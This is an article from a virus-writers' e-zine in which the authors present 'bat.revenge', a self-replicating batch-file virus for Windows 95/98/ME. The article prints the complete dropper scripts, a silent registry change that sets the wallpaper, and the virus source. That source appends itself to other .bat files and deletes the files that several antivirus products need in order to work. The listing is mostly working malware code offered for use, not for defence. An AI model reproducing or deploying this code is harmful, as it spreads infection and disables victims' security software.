When the going gets weird the weird turn pro
last article table of contents next article

bat.revenge by philet0ast3r & rastafarie

This is my (philet0ast3r) sixt virus (my forth batch-virus), and it was written end of October 2001.
End of September, "Pinoy Virus Writers E-Zine #6" should have come out, where the predecessor-virus
(Final Fantasy 23 - The Forces in your Vacuum Cleaner) to this one, should have been released. But it is like always ...
it is not out yet. As it seems the follow-up virus comes out before. Strange world.
This virus is very similar to his predecessor, only a little step higher. It is the first (me known ... and I know many ;)
batch-virus with a 16-million-color-payload, that does not use debug. And it was done, like its predecessor,
again by two guys, the virus again was done by me, and the payload comes from rastafarie this time. And apart from that:
-retro: F-Prot 95, McAfee, Thunderbyte, Norton AntiVirus 2000 (it does not recognize the virus, even if heuristic is at maximum)
-copies itself as call-back to the root-directory
-payload: changes the wallpaper or makes the victim clear, that it is infected
-fully compatible to Windows ME, Windows 98, Windows 95 (has been tested)
-size: 112.640 bytes (virus plus payload); 1.160 bytes (the virus only)

Well, and that is how this works:

The "original"-virus has got the name:
This is a selfextracting zip-archiv (thanks to WinZip and Phrozen Crew at this place). It contains the following files:
(You should not have it too easy, opening the files...) At executing, all files are extracted to a temporary folder, and revenge.com gets executed.
This is a batch-file in a com-file (yes, I refuse using something other than batch, and I know it would be much easier and more effective using
a "real" language, but I am a Dos-phreak, and I do not want to give that stuff up, as long as it still works).
"bat2com" by Foley Hi-Tech Systems (thanks to them at this place) was used for this.
Script of the original-batch-file of revenge.com:

@echo off
ctty nul
ren revenge.ico v0r.bat
call v0r.bat

As we see the file revenge.ico gets renamed to v0r.bat and then executed. This one does the following:

@echo off
ctty nul
ren revenge.dat revenge.reg
regedit /s revenge.reg
move revenge.exe c:\windows
ren c:\windows\revenge.exe revenge.bmp
move revenge.sys c:\windows
ren c:\windows\revenge.sys revenge.bat
call c:\windows\revenge.bat
ctty con

The file revenge.dat gets renamed to revenge.reg and then executed with the help of Regedit.
The parameter s is undocumented and stands for silent, that means without asking the user to add the given information to the registry.
The file revenge.reg looks like that:


[HKEY_CURRENT_USER\Control Panel\Desktop]

It is a standard-registry-file which contains data for a wallpaper.
The above mentioned batch-file changes then the file revenge.exe to this wallpaper, which then shows up at the next system-start.
Then the file revenge.sys gets moved to the windows-directory and then gets renamed to revenge.bat (the actual virus) and then executed.
And here is the virus:

@echo off%_revenge%
if '%1=='revenge goto revenge%2
set revenge=%0.bat
if not exist %revenge% set revenge=%0
if '%revenge%==' set revenge=autoexec.bat
if exist c:\_revenge.bat goto revengeg
if not exist %revenge% goto erevenge
find "revenge"<%revenge%>c:\_revenge.bat
attrib c:\_revenge.bat +h
command /c c:\_revenge revenge vir
ctty nul.revenge
if exist c:\_revenge.bat del c:\programme\norton~1\s32integ.dll
if exist c:\_revenge.bat del c:\programme\f-prot95\fpwm32.dll
if exist c:\_revenge.bat del c:\programme\mcafee\scan.dat
if exist c:\_revenge.bat del c:\tbavw95\tbscan.sig
if exist c:\windows\revenge.bmp goto narevenge
echo>revenge.inf you are infected with "bat.revenge" by PhileT0a$t3r [rRlf] & rastafarie [rRlf]
move revenge.inf c:\windows\desktop
set revenge=
goto revengeend
for %%a in (*.bat ..\*.bat c:*.bat) do call c:\_revenge revenge i %%a
exit revenge
find "revenge"<%3>nul
if not errorlevel 1 goto revengeend
type %3>revenge$
type c:\_revenge.bat>>revenge$
move revenge$ %3>nul
exit revenge

The virus itself has nothing really special. It does that, what a virus should do.
The virus searches as long for not infected files, until it finds one, which it infects then (only one per run),
or until it is running out of files. It contains a retro-routine, which deletes files, the above mentioned avs need to work.
The payload first looks, if the wallpaper (c:\windows\revenge.bmp) is existing.
If yes, it has already been installed before, and the virus can continue with its work.
If it is not existing it has either been deleted or only the virus has been executed (without all the zip-file-stuff).
In this case the file revenge.inf gets written and moved to the desktop. It contains the following:
you are infected with "bat.revenge" by PhileT0a$t3r [rRlf] & rastafarie [rRlf]

look at the payload picture

living virus